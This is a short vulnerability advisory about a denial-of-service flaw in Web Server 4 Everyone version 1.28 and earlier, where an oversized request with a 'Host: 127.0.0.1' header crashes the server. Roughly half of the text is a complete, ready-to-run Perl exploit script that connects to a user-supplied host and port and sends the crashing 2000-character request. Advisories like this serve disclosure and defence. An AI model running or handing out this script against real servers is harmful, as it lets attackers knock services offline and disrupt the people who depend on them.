|
|
|
|
| |
| WebServer 4 Everyone is an easy to use web server, however, a security vulnerability in the product allows remote attackers to cause it to no longer respond to legitimate requests. |
| |
Credit:
The information has been provided by Tamer Sahin.
|
| |
Vulnerable systems:
* Web Server 4 Everyone version 1.28 and prior
The problem is that Web Server 4 Everyone does not do adequate bounds checking. When an attacker sends a request with the size of 2000 characters and a "Host:" field that contains "127.0.0.1", the server will crash. The Web server must be restarted to regain normal functionality.
Exploit:
#!/usr/bin/perl -w
use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
$evil = "A" x 2000;
print "Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host port\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port)
|| die "Connection failed.\n";
print "Attacking...\n";
print $socket "GET /$evil HTTP/1.1\n Host: 127.0.0.1\n\n";
close($socket);
print "\nConnection closed. Finished.\n\n";
|
|
|
|
|
